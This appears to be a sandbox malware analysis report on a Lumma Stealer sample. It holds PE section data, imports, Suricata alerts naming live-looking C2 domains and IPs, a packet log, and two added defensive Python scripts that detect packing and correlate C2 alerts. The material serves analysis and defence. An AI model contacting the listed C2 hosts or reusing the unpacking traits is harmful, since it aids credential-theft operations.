mov dword ptr [00456B1Ch], eax
mov dword ptr [00456B10h], C0000409h
mov dword ptr [00456B14h], 00000001h
mov eax, dword ptr [00454004h]
mov dword ptr [ebp-00000328h], eax
mov eax, dword ptr [00454008h]
mov dword ptr [ebp-00000324h], eax
call dword ptr [000000C0h]
                                                                                                                                                                                                                                                                  Programming Language:
                                                                                                                                                                                                                                                                  • [C++] VS2008 build 21022
                                                                                                                                                                                                                                                                  • [ASM] VS2008 build 21022
                                                                                                                                                                                                                                                                  • [ C ] VS2008 build 21022
                                                                                                                                                                                                                                                                  • [IMP] VS2005 build 50727
                                                                                                                                                                                                                                                                  • [RES] VS2008 build 21022
                                                                                                                                                                                                                                                                  • [LNK] VS2008 build 21022
Data directories:
Name                                  Virtual Address  Virtual Size  Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT          0x0              0x0
IMAGE_DIRECTORY_ENTRY_IMPORT          0x5296c          0x50          .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE        0x431000         0xf430        .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION       0x0              0x0
IMAGE_DIRECTORY_ENTRY_SECURITY        0x0              0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC       0x0              0x0
IMAGE_DIRECTORY_ENTRY_DEBUG           0x0              0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT       0x0              0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR       0x0              0x0
IMAGE_DIRECTORY_ENTRY_TLS             0x0              0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG     0x524d0          0x40          .rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT    0x0              0x0
IMAGE_DIRECTORY_ENTRY_IAT             0x51000          0x188         .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT    0x0              0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR  0x0              0x0
IMAGE_DIRECTORY_ENTRY_RESERVED        0x0              0x0
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x4fdfc | 0x4fe00 | cc39435343f3039c24ae361aa0082cb9 | False | 0.8446730731611893 | data | 7.548735116985004 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata | 0x51000 | 0x224c | 0x2400 | 78a11ed87aa892a31015617ab8411c9b | False | 0.3493923611111111 | data | 5.344230957319916 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0x54000 | 0x3dc49c | 0x7000 | 81a00408d148aa5aa30169c9af2fa1ea | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0x431000 | 0xf430 | 0xf600 | 2b3cb98562ca0d71d9f1af978d20c708 | False | 0.47125889227642276 | data | 5.03387043119155 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
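The section table shows the two static traits that go with the report's "Detected unpacking" signatures: an executable .text at entropy 7.55 (compressed or encrypted code rather than plain x86) and a writable .data that declares 0x3dc49c bytes of virtual size but stores only 0x7000 on disk, leaving a large zero-filled region for a payload to be written at run time. The script below is an added example, not Joe Sandbox code: it parses a PE section table with struct and flags both traits. The PE it inspects is constructed in memory with the report's section names and characteristics (seeded random bytes stand in for the packed code), and the 7.0 entropy and 4x slack thresholds are assumptions to tune against your own corpus.

```python
# Added example, not Joe Sandbox code: parse a PE section table with struct and
# flag packed code and unpack slack.  The PE is constructed in memory below.
import math
import random
import struct

# Section characteristic bits (winnt.h)
IMAGE_SCN_CNT_CODE = 0x00000020
IMAGE_SCN_CNT_INITIALIZED_DATA = 0x00000040
IMAGE_SCN_MEM_EXECUTE = 0x20000000
IMAGE_SCN_MEM_READ = 0x40000000
IMAGE_SCN_MEM_WRITE = 0x80000000


def shannon_entropy(data: bytes) -> float:
    """Bits per byte: ~8.0 for compressed or encrypted data, ~5-6.5 for plain x86 code."""
    if not data:
        return 0.0
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    n = len(data)
    return 0.0 - sum(c / n * math.log2(c / n) for c in counts if c)


def parse_sections(pe: bytes) -> list:
    """DOS header -> e_lfanew -> PE signature -> COFF header -> 40-byte section headers."""
    e_lfanew = struct.unpack_from("<I", pe, 0x3C)[0]
    if pe[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    coff = e_lfanew + 4
    num_sections = struct.unpack_from("<H", pe, coff + 2)[0]
    opt_size = struct.unpack_from("<H", pe, coff + 16)[0]
    first = coff + 20 + opt_size
    sections = []
    for i in range(num_sections):
        name, vsize, va, raw_size, raw_ptr, _, _, _, _, chars = struct.unpack_from(
            "<8sIIIIIIHHI", pe, first + 40 * i)
        sections.append({"name": name.rstrip(b"\0").decode(), "virtual_size": vsize,
                         "virtual_address": va, "raw_size": raw_size,
                         "characteristics": chars, "raw": pe[raw_ptr:raw_ptr + raw_size]})
    return sections


def flag_sections(sections: list, entropy_threshold: float = 7.0, slack_ratio: int = 4) -> dict:
    """name -> (entropy, findings).  Both thresholds are assumptions; tune them per corpus."""
    out = {}
    for s in sections:
        flags, ent = [], shannon_entropy(s["raw"])
        if s["characteristics"] & IMAGE_SCN_MEM_EXECUTE and ent >= entropy_threshold:
            flags.append("packed-code")     # executable bytes look compressed or encrypted
        if (s["characteristics"] & IMAGE_SCN_MEM_WRITE and s["raw_size"]
                and s["virtual_size"] >= slack_ratio * s["raw_size"]):
            flags.append("unpack-slack")    # zero-filled room for a payload written at run time
        if s["raw_size"] == 0 and s["virtual_size"]:
            flags.append("virtual-only")    # nothing on disk at all
        out[s["name"]] = (round(ent, 2), flags)
    return out


def build_pe(sections: list) -> bytes:
    """Minimal PE32 image; only the fields parse_sections reads are populated.
    sections: [(name, virtual_size, raw_bytes, characteristics)]."""
    opt_size, e_lfanew = 224, 0x40
    hdr_len = e_lfanew + 4 + 20 + opt_size + 40 * len(sections)
    first_raw = (hdr_len + 0x1FF) & ~0x1FF                # 0x200 file alignment
    raw_ptr, va, table, body = first_raw, 0x1000, b"", b""
    for name, vsize, raw, chars in sections:
        table += struct.pack("<8sIIIIIIHHI", name.encode(), vsize, va, len(raw),
                             raw_ptr, 0, 0, 0, 0, chars)
        body += raw
        raw_ptr += len(raw)
        va = (va + max(vsize, len(raw)) + 0xFFF) & ~0xFFF  # 0x1000 section alignment
    dos = b"MZ" + b"\0" * (0x3C - 2) + struct.pack("<I", e_lfanew)
    coff = struct.pack("<HHIIIHH", 0x14C, len(sections), 0, 0, 0, opt_size, 0x102)
    header = dos + b"PE\0\0" + coff + b"\0" * opt_size + table
    return header + b"\0" * (first_raw - len(header)) + body


def sample_pe() -> bytes:
    """Constructed sample modelled on the report's table: seeded random bytes stand in
    for packed .text, ASCII import names for .rdata, and .data reserves 0x3dc49c
    bytes of virtual size while storing only 0x200 on disk."""
    rng = random.Random(2024)
    packed_code = bytes(rng.getrandbits(8) for _ in range(0x1000))
    strings = b"KERNEL32.dll\0GetProcAddress\0LoadLibraryA\0" * 48
    return build_pe([
        (".text", 0x1000, packed_code,
         IMAGE_SCN_CNT_CODE | IMAGE_SCN_MEM_EXECUTE | IMAGE_SCN_MEM_READ),
        (".rdata", len(strings), strings, IMAGE_SCN_CNT_INITIALIZED_DATA | IMAGE_SCN_MEM_READ),
        (".data", 0x3DC49C, b"\0" * 0x200,
         IMAGE_SCN_CNT_INITIALIZED_DATA | IMAGE_SCN_MEM_READ | IMAGE_SCN_MEM_WRITE),
    ])


if __name__ == "__main__":
    for name, (entropy, flags) in flag_sections(parse_sections(sample_pe())).items():
        print(f"{name:8} entropy={entropy:5.2f}  {' '.join(flags) or 'ok'}")
```

To run it against a real file, replace `sample_pe()` with the file's bytes; the parser only reads the COFF header and section table, so it copes with the truncated or zeroed optional-header fields packers often leave behind. Neither flag is proof of packing on its own (a genuinely large .bss produces the same slack), which is why the report pairs the static traits with the behavioural "overwrites its own PE header" signature.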
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_CURSOR | 0x43c0c8 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 0 | - | - | 0.31023454157782515
RT_ICON | 0x431610 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colors | Turkmen | Turkmenistan | 0.3296908315565032
RT_ICON | 0x4324b8 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colors | Turkmen | Turkmenistan | 0.3935018050541516
RT_ICON | 0x432d60 | 0x6c8 | Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colors | Turkmen | Turkmenistan | 0.3945852534562212
RT_ICON | 0x433428 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colors | Turkmen | Turkmenistan | 0.4031791907514451
RT_ICON | 0x433990 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 9600 | Turkmen | Turkmenistan | 0.22074688796680497
RT_ICON | 0x435f38 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 4224 | Turkmen | Turkmenistan | 0.24835834896810507
RT_ICON | 0x436fe0 | 0x988 | Device independent bitmap graphic, 24 x 48 x 32, image size 2400 | Turkmen | Turkmenistan | 0.2778688524590164
RT_ICON | 0x437968 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 1088 | Turkmen | Turkmenistan | 0.30319148936170215
RT_ICON | 0x437e48 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colors | Turkmen | Turkmenistan | 0.8136993603411514
RT_ICON | 0x438cf0 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colors | Turkmen | Turkmenistan | 0.8298736462093863
RT_ICON | 0x439598 | 0x6c8 | Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colors | Turkmen | Turkmenistan | 0.7920506912442397
RT_ICON | 0x439c60 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colors | Turkmen | Turkmenistan | 0.755057803468208
RT_ICON | 0x43a1c8 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 4096 | Turkmen | Turkmenistan | 0.8339587242026266
RT_ICON | 0x43b270 | 0x988 | Device independent bitmap graphic, 24 x 48 x 32, image size 2304 | Turkmen | Turkmenistan | 0.8426229508196721
RT_ICON | 0x43bbf8 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 1024 | Turkmen | Turkmenistan | 0.8608156028368794
RT_STRING | 0x43d140 | 0x47a | data | - | - | 0.4424083769633508
RT_STRING | 0x43d5c0 | 0xc8 | data | - | - | 0.57
RT_STRING | 0x43d688 | 0x6a8 | data | - | - | 0.43133802816901406
RT_STRING | 0x43dd30 | 0x600 | data | - | - | 0.4303385416666667
RT_STRING | 0x43e330 | 0x802 | data | - | - | 0.41804878048780486
RT_STRING | 0x43eb38 | 0x75e | data | - | - | 0.4268292682926829
RT_STRING | 0x43f298 | 0x56c | data | - | - | 0.4546109510086455
RT_STRING | 0x43f808 | 0x6ce | data | - | - | 0.4293915040183697
RT_STRING | 0x43fed8 | 0x556 | data | - | - | 0.44363103953147875
RT_GROUP_CURSOR | 0x43cf70 | 0x14 | data | - | - | 1.25
RT_GROUP_ICON | 0x43c060 | 0x68 | data | Turkmen | Turkmenistan | 0.7115384615384616
RT_GROUP_ICON | 0x437dd0 | 0x76 | data | Turkmen | Turkmenistan | 0.6610169491525424
RT_VERSION | 0x43cf88 | 0x1b4 | data | - | - | 0.5688073394495413
DLL | Import
KERNEL32.dll | SetDefaultCommConfigA, GetNumaProcessorNode, DeleteVolumeMountPointA, InterlockedIncrement, InterlockedDecrement, SetComputerNameW, GetProcessPriorityBoost, GetModuleHandleW, GetEnvironmentStrings, LoadLibraryW, GetVersionExW, GetTimeFormatW, GetConsoleAliasW, GetFileAttributesW, GetStartupInfoA, SetLastError, GetProcAddress, SetFileAttributesA, UnregisterWait, ResetEvent, LoadLibraryA, Process32Next, LocalAlloc, GetFileType, AddAtomW, FoldStringW, GetModuleFileNameA, GetModuleHandleA, SetLocaleInfoW, UpdateResourceW, OpenFileMappingW, WriteConsoleOutputAttribute, WriteProcessMemory, BuildCommDCBW, GetCommandLineW, CreateFileA, WriteConsoleW, GetLastError, HeapFree, MultiByteToWideChar, HeapAlloc, GetCommandLineA, TerminateProcess, GetCurrentProcess, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsDebuggerPresent, HeapCreate, VirtualFree, DeleteCriticalSection, LeaveCriticalSection, EnterCriticalSection, VirtualAlloc, HeapReAlloc, GetCPInfo, GetACP, GetOEMCP, IsValidCodePage, TlsGetValue, TlsAlloc, TlsSetValue, TlsFree, GetCurrentThreadId, Sleep, ExitProcess, WriteFile, GetStdHandle, SetHandleCount, HeapSize, FreeEnvironmentStringsA, FreeEnvironmentStringsW, WideCharToMultiByte, GetEnvironmentStringsW, QueryPerformanceCounter, GetTickCount, GetCurrentProcessId, GetSystemTimeAsFileTime, InitializeCriticalSectionAndSpinCount, RtlUnwind, LCMapStringA, LCMapStringW, GetStringTypeA, GetStringTypeW, GetLocaleInfoA, ReadFile, GetConsoleCP, GetConsoleMode, FlushFileBuffers, SetFilePointer, SetStdHandle, CloseHandle, WriteConsoleA, GetConsoleOutputCP
USER32.dll | GetProcessDefaultLayout
GDI32.dll | GetBitmapBits
Language of compilation system | Country where language is spoken | Map
Turkmen | Turkmenistan | -
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-12-14T14:16:18.900335+0100 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.6 | 49722 | 104.21.56.70 | 443 | TCP
2024-12-14T14:16:20.657689+0100 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.6 | 49726 | 176.113.115.19 | 80 | TCP
2024-12-14T14:16:25.760174+0100 | 2058226 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (sordid-snaked .cyou) | 1 | 192.168.2.6 | 63859 | 1.1.1.1 | 53 | UDP
2024-12-14T14:16:25.984571+0100 | 2058222 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (immureprech .biz) | 1 | 192.168.2.6 | 64353 | 1.1.1.1 | 53 | UDP
2024-12-14T14:16:27.357655+0100 | 2058223 | ET MALWARE Observed Win32/Lumma Stealer Related Domain (immureprech .biz in TLS SNI) | 1 | 192.168.2.6 | 49752 | 104.21.22.222 | 443 | TCP
2024-12-14T14:16:27.357655+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.6 | 49752 | 104.21.22.222 | 443 | TCP
2024-12-14T14:16:28.405476+0100 | 2049836 | ET MALWARE Lumma Stealer Related Activity | 1 | 192.168.2.6 | 49752 | 104.21.22.222 | 443 | TCP
2024-12-14T14:16:28.405476+0100 | 2054653 | ET MALWARE Lumma Stealer CnC Host Checkin | 1 | 192.168.2.6 | 49752 | 104.21.22.222 | 443 | TCP
2024-12-14T14:16:28.412659+0100 | 2058214 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (deafeninggeh .biz) | 1 | 192.168.2.6 | 54461 | 1.1.1.1 | 53 | UDP
2024-12-14T14:16:29.854582+0100 | 2058215 | ET MALWARE Observed Win32/Lumma Stealer Related Domain (deafeninggeh .biz in TLS SNI) | 1 | 192.168.2.6 | 49759 | 104.21.96.1 | 443 | TCP
2024-12-14T14:16:29.854582+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.6 | 49759 | 104.21.96.1 | 443 | TCP
2024-12-14T14:16:30.731798+0100 | 2049836 | ET MALWARE Lumma Stealer Related Activity | 1 | 192.168.2.6 | 49759 | 104.21.96.1 | 443 | TCP
2024-12-14T14:16:30.731798+0100 | 2054653 | ET MALWARE Lumma Stealer CnC Host Checkin | 1 | 192.168.2.6 | 49759 | 104.21.96.1 | 443 | TCP
2024-12-14T14:16:30.739913+0100 | 2058220 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (effecterectz .xyz) | 1 | 192.168.2.6 | 49493 | 1.1.1.1 | 53 | UDP
2024-12-14T14:16:30.999936+0100 | 2058218 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (diffuculttan .xyz) | 1 | 192.168.2.6 | 56428 | 1.1.1.1 | 53 | UDP
2024-12-14T14:16:31.222907+0100 | 2058216 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (debonairnukk .xyz) | 1 | 192.168.2.6 | 51288 | 1.1.1.1 | 53 | UDP
2024-12-14T14:16:31.448194+0100 | 2058236 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (wrathful-jammy .cyou) | 1 | 192.168.2.6 | 64555 | 1.1.1.1 | 53 | UDP
2024-12-14T14:16:31.670893+0100 | 2058210 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (awake-weaves .cyou) | 1 | 192.168.2.6 | 62214 | 1.1.1.1 | 53 | UDP
2024-12-14T14:16:31.897603+0100 | 2058226 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (sordid-snaked .cyou) | 1 | 192.168.2.6 | 52796 | 1.1.1.1 | 53 | UDP
2024-12-14T14:16:33.573527+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.6 | 49768 | 23.55.153.106 | 443 | TCP
2024-12-14T14:16:34.423166+0100 | 2858666 | ETPRO MALWARE Win32/Lumma Stealer Steam Profile Lookup | 1 | 192.168.2.6 | 49768 | 23.55.153.106 | 443 | TCP
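The alert table shows the stealer walking its list of C2 domains: every candidate produces a "CnC Domain in DNS Lookup" alert, only immureprech.biz and deafeninggeh.biz go on to a "TLS SNI" alert, and the "CnC Host Checkin" alert that follows a successful connection names no domain at all, so it has to be joined to the SNI alert on the same TCP 4-tuple. The script below is an added example, not Joe Sandbox output, that does that join over a constructed, tab-separated subset of the rows above (column order as in the table; the ET signature names carry the domain defanged as "label .tld" and are refanged for the result). It reports, per domain, whether it was only looked up, reached TLS, or accepted a check-in, plus the alerting TCP flows that no SNI alert tied to a domain (here the Steam profile lookup flow).

```python
# Added example (not Joe Sandbox output): join Suricata alerts on domain and
# TCP flow to see which C2 candidates were only resolved and which checked in.
import re

# Constructed subset of the alert table above, tab-separated in the table's
# column order: timestamp, SID, signature, severity, src IP, src port,
# dst IP, dst port, protocol.
ALERTS = """\
2024-12-14T14:16:25.760174+0100\t2058226\tET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (sordid-snaked .cyou)\t1\t192.168.2.6\t63859\t1.1.1.1\t53\tUDP
2024-12-14T14:16:25.984571+0100\t2058222\tET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (immureprech .biz)\t1\t192.168.2.6\t64353\t1.1.1.1\t53\tUDP
2024-12-14T14:16:27.357655+0100\t2058223\tET MALWARE Observed Win32/Lumma Stealer Related Domain (immureprech .biz in TLS SNI)\t1\t192.168.2.6\t49752\t104.21.22.222\t443\tTCP
2024-12-14T14:16:27.357655+0100\t2028371\tET JA3 Hash - Possible Malware - Fake Firefox Font Update\t3\t192.168.2.6\t49752\t104.21.22.222\t443\tTCP
2024-12-14T14:16:28.405476+0100\t2054653\tET MALWARE Lumma Stealer CnC Host Checkin\t1\t192.168.2.6\t49752\t104.21.22.222\t443\tTCP
2024-12-14T14:16:28.412659+0100\t2058214\tET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (deafeninggeh .biz)\t1\t192.168.2.6\t54461\t1.1.1.1\t53\tUDP
2024-12-14T14:16:29.854582+0100\t2058215\tET MALWARE Observed Win32/Lumma Stealer Related Domain (deafeninggeh .biz in TLS SNI)\t1\t192.168.2.6\t49759\t104.21.96.1\t443\tTCP
2024-12-14T14:16:30.731798+0100\t2054653\tET MALWARE Lumma Stealer CnC Host Checkin\t1\t192.168.2.6\t49759\t104.21.96.1\t443\tTCP
2024-12-14T14:16:30.739913+0100\t2058220\tET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (effecterectz .xyz)\t1\t192.168.2.6\t49493\t1.1.1.1\t53\tUDP
2024-12-14T14:16:31.670893+0100\t2058210\tET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (awake-weaves .cyou)\t1\t192.168.2.6\t62214\t1.1.1.1\t53\tUDP
2024-12-14T14:16:31.897603+0100\t2058226\tET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (sordid-snaked .cyou)\t1\t192.168.2.6\t52796\t1.1.1.1\t53\tUDP
2024-12-14T14:16:34.423166+0100\t2858666\tETPRO MALWARE Win32/Lumma Stealer Steam Profile Lookup\t1\t192.168.2.6\t49768\t23.55.153.106\t443\tTCP
"""

# ET names the domain defanged as "label .tld"; refang it for lookups and blocklists.
DEFANGED = re.compile(r"\(([A-Za-z0-9-]+) \.([a-z]+)(?: in TLS SNI)?\)")


def parse_alert(line: str) -> dict:
    ts, sid, sig, sev, sip, sport, dip, dport, proto = line.split("\t")
    return {"ts": ts, "sid": int(sid), "sig": sig, "severity": int(sev),
            "flow": (sip, int(sport), dip, int(dport), proto)}


def domain_from_signature(sig: str):
    m = DEFANGED.search(sig)
    return f"{m.group(1)}.{m.group(2)}" if m else None


def correlate(text: str):
    """Return (domains, unnamed_flows).
    domains: domain -> first DNS lookup, SNI time, check-in time, server IP (first-seen order).
    unnamed_flows: TCP flows that alerted but that no SNI alert tied to a domain."""
    domains, flow_domain, unnamed = {}, {}, {}
    for a in map(parse_alert, text.splitlines()):
        dom = domain_from_signature(a["sig"])
        if dom:
            rec = domains.setdefault(dom, {"dns": None, "sni": None, "checkin": None, "server": None})
            if "DNS Lookup" in a["sig"]:
                rec["dns"] = rec["dns"] or a["ts"]            # keep the first query
            elif "in TLS SNI" in a["sig"]:
                rec["sni"], rec["server"] = a["ts"], a["flow"][2]
                flow_domain[a["flow"]] = dom                  # later alerts on this 4-tuple belong to dom
            continue
        named = flow_domain.get(a["flow"])
        if named and "CnC Host Checkin" in a["sig"]:
            domains[named]["checkin"] = a["ts"]
        elif not named and a["flow"][4] == "TCP":
            unnamed.setdefault(a["flow"], a["sig"])
    return domains, unnamed


def reached_checkin(domains: dict) -> list:
    """Domains that got past resolution to a server that accepted a check-in."""
    return [d for d, r in domains.items() if r["checkin"]]


if __name__ == "__main__":
    domains, unnamed = correlate(ALERTS)
    for d, r in domains.items():
        stage = "checkin" if r["checkin"] else "tls" if r["sni"] else "dns-only"
        print(f"{d:22} {stage:8} {r['server'] or '-'}")
    for flow, sig in unnamed.items():
        print("unnamed flow", flow, "->", sig)
```

The join on the 4-tuple is the part worth keeping: the same flow is what ties the JA3 and check-in alerts to a server that an SNI alert already named, and a check-in with no SNI alert on its flow is a hint that the SNI rule set is behind the sample's current domain list. The DNS-only domains are still indicators, but the two that reached a check-in are the ones to block and hunt for first.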
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Dec 14, 2024 14:16:16.973021030 CET | 49722 | 443 | 192.168.2.6 | 104.21.56.70
Dec 14, 2024 14:16:16.973089933 CET | 443 | 49722 | 104.21.56.70 | 192.168.2.6
Dec 14, 2024 14:16:16.973167896 CET | 49722 | 443 | 192.168.2.6 | 104.21.56.70
Dec 14, 2024 14:16:17.024014950 CET | 49722 | 443 | 192.168.2.6 | 104.21.56.70
Dec 14, 2024 14:16:17.024075031 CET | 443 | 49722 | 104.21.56.70 | 192.168.2.6
Dec 14, 2024 14:16:18.243246078 CET | 443 | 49722 | 104.21.56.70 | 192.168.2.6
Dec 14, 2024 14:16:18.243319035 CET | 49722 | 443 | 192.168.2.6 | 104.21.56.70
Dec 14, 2024 14:16:18.363826036 CET | 49722 | 443 | 192.168.2.6 | 104.21.56.70
Dec 14, 2024 14:16:18.363853931 CET | 443 | 49722 | 104.21.56.70 | 192.168.2.6
Dec 14, 2024 14:16:18.364262104 CET | 443 | 49722 | 104.21.56.70 | 192.168.2.6
Dec 14, 2024 14:16:18.364345074 CET | 49722 | 443 | 192.168.2.6 | 104.21.56.70
Dec 14, 2024 14:16:18.385513067 CET | 49722 | 443 | 192.168.2.6 | 104.21.56.70
Dec 14, 2024 14:16:18.431328058 CET | 443 | 49722 | 104.21.56.70 | 192.168.2.6
Dec 14, 2024 14:16:18.900408030 CET | 443 | 49722 | 104.21.56.70 | 192.168.2.6
Dec 14, 2024 14:16:18.900635958 CET | 443 | 49722 | 104.21.56.70 | 192.168.2.6
Dec 14, 2024 14:16:18.900768995 CET | 49722 | 443 | 192.168.2.6 | 104.21.56.70
Dec 14, 2024 14:16:18.958976984 CET | 49722 | 443 | 192.168.2.6 | 104.21.56.70
Dec 14, 2024 14:16:18.959017038 CET | 443 | 49722 | 104.21.56.70 | 192.168.2.6
Dec 14, 2024 14:16:18.959049940 CET | 49722 | 443 | 192.168.2.6 | 104.21.56.70
Dec 14, 2024 14:16:18.959145069 CET | 49722 | 443 | 192.168.2.6 | 104.21.56.70
Dec 14, 2024 14:16:19.199212074 CET | 49726 | 80 | 192.168.2.6 | 176.113.115.19
Dec 14, 2024 14:16:19.319329023 CET | 80 | 49726 | 176.113.115.19 | 192.168.2.6
Dec 14, 2024 14:16:19.319457054 CET | 49726 | 80 | 192.168.2.6 | 176.113.115.19
Dec 14, 2024 14:16:19.343600988 CET | 49726 | 80 | 192.168.2.6 | 176.113.115.19
Dec 14, 2024 14:16:19.463454962 CET | 80 | 49726 | 176.113.115.19 | 192.168.2.6
Dec 14, 2024 14:16:20.657592058 CET | 80 | 49726 | 176.113.115.19 | 192.168.2.6
Dec 14, 2024 14:16:20.657635927 CET | 80 | 49726 | 176.113.115.19 | 192.168.2.6
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:20.657689095 CET4972680192.168.2.6176.113.115.19
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:20.657778025 CET4972680192.168.2.6176.113.115.19
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:20.658616066 CET8049726176.113.115.19192.168.2.6
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:20.658662081 CET8049726176.113.115.19192.168.2.6
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:20.658674955 CET8049726176.113.115.19192.168.2.6
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:20.658777952 CET4972680192.168.2.6176.113.115.19
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:20.658777952 CET4972680192.168.2.6176.113.115.19
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:20.658818960 CET8049726176.113.115.19192.168.2.6
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:20.658829927 CET8049726176.113.115.19192.168.2.6
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:20.658842087 CET8049726176.113.115.19192.168.2.6
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:20.658854961 CET8049726176.113.115.19192.168.2.6
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:20.658885956 CET4972680192.168.2.6176.113.115.19
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:20.658915043 CET4972680192.168.2.6176.113.115.19
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:20.658963919 CET8049726176.113.115.19192.168.2.6
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:20.659070969 CET4972680192.168.2.6176.113.115.19
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:20.777564049 CET8049726176.113.115.19192.168.2.6
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:20.777631998 CET4972680192.168.2.6176.113.115.19
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:20.777646065 CET8049726176.113.115.19192.168.2.6
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:20.777854919 CET4972680192.168.2.6176.113.115.19
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:20.781755924 CET8049726176.113.115.19192.168.2.6
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:20.781975985 CET4972680192.168.2.6176.113.115.19
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:20.850800991 CET8049726176.113.115.19192.168.2.6
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:20.850902081 CET8049726176.113.115.19192.168.2.6
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:20.851067066 CET4972680192.168.2.6176.113.115.19
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:20.854913950 CET8049726176.113.115.19192.168.2.6
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:20.855000973 CET4972680192.168.2.6176.113.115.19
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:20.855045080 CET8049726176.113.115.19192.168.2.6
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:20.855096102 CET4972680192.168.2.6176.113.115.19
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:20.863306999 CET8049726176.113.115.19192.168.2.6
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:20.863399029 CET4972680192.168.2.6176.113.115.19
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:20.866380930 CET8049726176.113.115.19192.168.2.6
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:20.866477966 CET4972680192.168.2.6176.113.115.19
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:20.866483927 CET8049726176.113.115.19192.168.2.6
